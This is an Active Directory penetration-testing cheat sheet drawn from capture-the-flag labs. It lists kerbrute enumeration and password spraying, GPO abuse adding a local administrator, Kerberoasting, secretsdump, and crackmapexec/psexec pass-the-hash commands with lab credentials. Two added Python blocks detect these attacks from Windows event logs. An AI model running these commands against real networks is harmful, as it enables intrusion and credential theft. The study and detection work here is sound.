RDP
xfreerdp +clipboard /u:<username> /p:<passwd> /v:<ip>
Python Bloodhound
python3 /root/BloodHound.py/bloodhound.py -c All,LoggedOn -u "t-skid" -p "tj072889*" -d VULNNET-RST.LOCAL -ns 10.10.238.153
GPO abuse
.\sharpgpo.exe --AddComputerTask --TaskName "Nothing" --Author vulnnet/administrator --command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
Null Session using rpcclient
rpcclient -U "" -N 10.10.10.172
kerbrute
- Brute forces valid Active Directory accounts through Kerberos Pre-Authentication
--dc
- location of the Domain Controller (KDC) to target
-d
- Full domain
bruteforce
- Bruteforce username:password combos, from a file or stdin
bruteuser
- Bruteforce a single user's password from a wordlist
passwordspray
- Test a single password against a list of users
userenum
- Enumerate valid domain usernames via Kerberos
./kerbrute userenum --dc intelligence.htb -d intelligence.htb users.lst
for user in $(cat <users dir>); do ./kerbrute bruteuser --dc <IP> -d marvel.local <dir pass> $user; done
- Runs kerbrute multiple times, testing every password in the wordlist against each user in the list
./kerbrute passwordspray --dc <IP> -d marvel.local <dir userlist> 'password'
- Use when you have one password and need to spray it against users throughout the domain
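As an added example (not part of these notes), the defender's side of the kerbrute subcommands above: Python detection logic run over constructed Domain Controller Security events. The event IDs and result codes are Microsoft's (4768 = TGT requested, 4771 = Kerberos pre-authentication failed, 0x6 = client principal unknown, 0x18 = pre-auth failed); the field names, thresholds, window and sample data are assumptions made for this example.

```python
"""Detection logic for kerbrute-style Kerberos abuse, run over constructed
Security-log events.

Added example, not part of the original notes. Assumes the DC's 4768 and
4771 events have been flattened into dicts with the fields used below; the
thresholds and window are illustrative, not tuned values.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs).
#   4768 with result code 0x6   -> client principal unknown (user does not exist)
#   4771 with failure code 0x18 -> pre-auth failed (existing user, wrong password)
SAMPLE_EVENTS = [
    # userenum burst from 10.0.0.50: a wordlist of names that are not in the domain
    *[{"time": f"2024-05-01T09:00:{s:02d}", "event_id": 4768, "user": u,
       "ip": "10.0.0.50", "code": "0x6"}
      for s, u in enumerate(["jdoe", "asmith", "printer", "backup2", "svc_old", "zz"])],
    # passwordspray from 10.0.0.51: one password tried against many valid users
    *[{"time": f"2024-05-01T09:10:{s:02d}", "event_id": 4771, "user": u,
       "ip": "10.0.0.51", "code": "0x18"}
      for s, u in enumerate(["alice", "bob", "carol", "dave", "erin"])],
    # bruteuser from 10.0.0.52: many passwords tried against one user
    *[{"time": f"2024-05-01T09:20:{s:02d}", "event_id": 4771, "user": "frank",
       "ip": "10.0.0.52", "code": "0x18"}
      for s in range(7)],
    # benign noise: one mistyped password and one mistyped username
    {"time": "2024-05-01T09:30:00", "event_id": 4771, "user": "alice",
     "ip": "10.0.0.7", "code": "0x18"},
    {"time": "2024-05-01T09:31:00", "event_id": 4768, "user": "alcie",
     "ip": "10.0.0.7", "code": "0x6"},
]


def _max_in_window(evs, window, key):
    """Largest number of distinct key(e) values inside any span of `window`.

    `evs` must be sorted by time. Quadratic, which is fine for one source
    IP's failure volume; use a deque if it ever matters.
    """
    best = 0
    for i, start in enumerate(evs):
        t0 = datetime.fromisoformat(start["time"])
        seen = set()
        for e in evs[i:]:
            if datetime.fromisoformat(e["time"]) - t0 > window:
                break
            seen.add(key(e))
        best = max(best, len(seen))
    return best


def detect(events, window=timedelta(minutes=5), threshold=5):
    """Return findings, one dict per (rule, source IP[, user]) that fires.

    Rules, each scoped to a single source IP and one sliding window:
      user_enum              - >= threshold distinct unknown usernames (4768 / 0x6)
      password_spray         - >= threshold distinct valid users, bad password (4771 / 0x18)
      single_user_bruteforce - >= threshold bad-password attempts against one user
    """
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):  # ISO strings sort by time
        by_ip[e["ip"]].append(e)

    findings = []
    for ip in sorted(by_ip):
        evs = by_ip[ip]
        unknown = [e for e in evs if e["event_id"] == 4768 and e["code"] == "0x6"]
        bad_pw = [e for e in evs if e["event_id"] == 4771 and e["code"] == "0x18"]

        n = _max_in_window(unknown, window, key=lambda e: e["user"])
        if n >= threshold:
            findings.append({"kind": "user_enum", "ip": ip, "user": None, "count": n})

        n = _max_in_window(bad_pw, window, key=lambda e: e["user"])
        if n >= threshold:
            findings.append({"kind": "password_spray", "ip": ip, "user": None, "count": n})

        per_user = defaultdict(list)
        for e in bad_pw:
            per_user[e["user"]].append(e)
        for user in sorted(per_user):
            # key=id counts attempts rather than distinct values, because
            # several attempts can share one timestamp
            n = _max_in_window(per_user[user], window, key=id)
            if n >= threshold:
                findings.append({"kind": "single_user_bruteforce", "ip": ip,
                                 "user": user, "count": n})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Scoping every rule to the source IP is what separates a spray from the background of users mistyping their passwords: the two noise events from 10.0.0.7 never reach the threshold, while the three attacking hosts each trip exactly one rule. Kerberos auditing (Account Logon: Kerberos Authentication Service) has to be enabled on the DC for 4768/4771 to exist at all.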
python GetNPUsers.py <domain>/<user> -no-pass
python secretsdump.py -just-dc backup@spookysec.local
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
- Kerberoasting
AS-REP roasting
python3 /root/impacket/examples/GetNPUsers.py -dc-ip 10.10.10.161 -usersfile users.lst htb/
When the IPC$ share is readable, you can try to enumerate users with lookupsid.py
crackmapexec protocol options
winrm
- own stuff using WINRM
ssh
- own stuff using SSH
smb
- own stuff using SMB
ldap
- own stuff using ldap
mssql
- own stuff using MSSQL
Enumeration for null session -
crackmapexec smb <ip> -u '' -p ''
crackmapexec smb <ip> -u 'guest' -p ' '
crackmapexec smb windcorp.thm -u 'lilyle' -p 'ChangeMe#1234' --rid-brute
crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
crackmapexec <ip/CIDR> -u <user> -d <domain> -p <passwd>
- Sweeps the network for the computers where the password you've obtained works (Pass the Password)
crackmapexec <ip/CIDR> -u <user> -H <hash> --local
- Sweeps the network with the NTLM hash to see where it authenticates (Pass the Hash)
crackmapexec smb 192.168.1.0/24 -u fcastle -d MARVEL.local -p Password1
add-ons: --sam (dump the SAM, if it works)
psexec.py marvel/fcastle:Password1@192.168.1.86
crackmapexec smb 192.168.1.0/24 -u "Frank Castle" -H 64f12cddaa88057e06a81b54e73b949b --local-auth
(passing the hash throughout a network)
psexec.py "Frank Castle":@192.168.1.86 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
- (-hashes takes LM:NT; aad3b435b51404eeaad3b435b51404ee is the empty LM hash placed in front of the NT hash)
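As an added example (not part of these notes), what the crackmapexec sweeps above look like from the blue side: Python that correlates 4624/4625 logon events forwarded from many hosts and flags one source IP authenticating to many machines in a short window. The event IDs, LogonType 3 (network) and the NTLM/Kerberos package names are Microsoft's; the field names, thresholds, bucketing and sample data are assumptions made for this example.

```python
"""Spot credential sweeps (crackmapexec-style pass-the-password / pass-the-hash
across a subnet) in Windows logon events collected from many hosts.

Added example, not part of the original notes. Assumes every host forwards
its 4624 (successful logon) and 4625 (failed logon) events to one list of
dicts with the fields below; thresholds and window are illustrative.
"""
from collections import defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)


def _ev(time, eid, user, ip, computer, auth="NTLM", logon_type=3):
    """Build one flattened logon event (constructed test data, not a real log)."""
    return {"time": time, "event_id": eid, "user": user, "ip": ip,
            "computer": computer, "auth_pkg": auth, "logon_type": logon_type}


# Constructed sample events. LogonType 3 = network logon (e.g. SMB). Sweeps
# that target IP addresses end up as NTLM, because Kerberos needs a
# hostname-based SPN, so an NTLM-only fan-out is an extra tell.
SAMPLE_EVENTS = [
    # sweep from 10.0.0.99: one account tried against a /24, 8 hits, 3 refusals
    *[_ev(f"2024-05-01T10:01:{i:02d}", 4624, "fcastle", "10.0.0.99", f"WS{i:02d}")
      for i in range(1, 9)],
    *[_ev(f"2024-05-01T10:02:{i:02d}", 4625, "fcastle", "10.0.0.99", f"SRV{i:02d}")
      for i in range(1, 4)],
    # benign: an admin hopping to two servers an hour apart, via Kerberos
    _ev("2024-05-01T10:00:30", 4624, "admin", "10.0.0.5", "FS01", auth="Kerberos"),
    _ev("2024-05-01T11:00:30", 4624, "admin", "10.0.0.5", "DC01", auth="Kerberos"),
    # benign: one user opening one share
    _ev("2024-05-01T10:01:10", 4624, "bob", "10.0.0.23", "FS01"),
    # interactive console logon (type 2): not a network logon, ignored by the rule
    _ev("2024-05-01T10:01:20", 4624, "carol", "-", "WS03", logon_type=2),
]


def _bucket(ts, window):
    """Fixed time-bucket index. Simple and streaming-friendly; the trade-off
    is that a burst straddling a bucket edge can be split in two."""
    return (datetime.fromisoformat(ts) - EPOCH) // window


def detect_sweeps(events, window=timedelta(minutes=5), min_hosts=5):
    """Return one finding per (source IP, account, bucket) that reached
    `min_hosts` distinct target computers via network logons.

    Both successes and failures count toward the host total: a spray of a
    wrong password across a subnet is just as interesting as a working one.
    """
    groups = defaultdict(lambda: {"hosts": set(), "ok": 0, "fail": 0, "auth": set()})
    for e in events:
        if e["logon_type"] != 3:
            continue
        key = (e["ip"], e["user"].lower(), _bucket(e["time"], window))
        g = groups[key]
        g["hosts"].add(e["computer"])
        g["auth"].add(e["auth_pkg"])
        if e["event_id"] == 4624:
            g["ok"] += 1
        elif e["event_id"] == 4625:
            g["fail"] += 1

    findings = []
    for (ip, user, _), g in sorted(groups.items(), key=lambda kv: kv[0][:2]):
        if len(g["hosts"]) >= min_hosts:
            findings.append({
                "ip": ip,
                "user": user,
                "hosts": sorted(g["hosts"]),
                "successes": g["ok"],
                "failures": g["fail"],
                "ntlm_only": g["auth"] == {"NTLM"},
            })
    return findings


if __name__ == "__main__":
    for finding in detect_sweeps(SAMPLE_EVENTS):
        print(finding)
```

The rule needs logs from the targets, not just the DC: a local-auth sweep (`--local-auth`) never touches the domain controller, so only the workstations' own 4624/4625 events record it. That is the practical reason to forward Security logs from every host rather than only from servers.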
secretsdump.py
secretsdump.py marvel/fcastle:Password1@192.168.1.86
#### Enumerating SMB
metasploit modules -
auxiliary/scanner/smb/smb_version
- SMB version detection
smbclient -L \\\\<Target IP>\\
- enumeration of shares
exploit/windows/smb/psexec
- Obtaining local hashes on a machine
load incognito
- in the meterpreter session; loads the token impersonation extension
evil-winrm -i 10.10.92.93 -u Administrator -p 'P@$$W0rd'
evil-winrm -i 10.10.159.33 -u Administrator -H <hash>